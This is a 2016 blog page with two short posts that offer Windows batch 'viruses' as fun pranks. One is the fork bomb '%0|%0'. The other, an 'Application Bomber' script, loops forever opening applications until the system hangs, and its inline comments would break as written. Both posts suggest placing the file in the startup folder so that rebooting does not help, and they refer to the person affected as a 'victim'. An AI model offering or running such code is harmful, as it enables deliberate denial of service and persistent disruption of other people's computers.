add-unit1

Showing posts with label computer hanged. Show all posts
Showing posts with label computer hanged. Show all posts

Monday, 5 December 2016

Fork Bomb

Guys, what do you understand by a Fork Bomb?  

Most of you must be aware of this, but today I am going to show you a smallest virus that can can act like a grenade.

Believe me, you are gonna love this virus. It basically consumes all the CPU resources & make it hanged.


This code creates a large number of processes very quickly in order to saturate the process table of windows. And it will just hang the windows. No solution other than reboot the windows.

& if this virus is present in startup folder, god saves you. :)

(if this is in startup, then also it can be prevented, I will show you that in another article)

So here is the code:
Tiny but most powerful:

%0|%0


Just copy these 5 characters in a notepad & save it as .bat file. run this & be amazed of it. :)




If you want to see some other viruses as well then just click the below link:


Keep visiting to have more fun stuff.

Application Bomber

Hey guys, Hope all you are doing well.
Here is another virus that will eventually eats up all the CPU memory & will hang your computer. :)

Once you trigger this virus, it will flood the instances of listed applications in the virus code, You can add/remove more applications as per your requirement in the same syntax.

So Here is the code: :)
Copy & paste the code in a notepad, &  save it with a name <filename>.bat


@echo off    // It basically instructs to hide the commands when batch files is executed
:x   //loop variable
startwinword 
startmspaint  //open paint
start notepad
start write
startcmd //open command prompt
start explorer
start control
startcalc // open calculator
goto x // infinite loop



This code once executed will start opening different applications like paint,notepad,command prompt repeatedly, irritating victim and of course affecting the performance. & eventually your system will be hanged forever until you restart. 

(or if you put this piece of code in startup folder, simple restart also won't work here)
So play around with these small viruses, & keep visiting here with more fun stuff.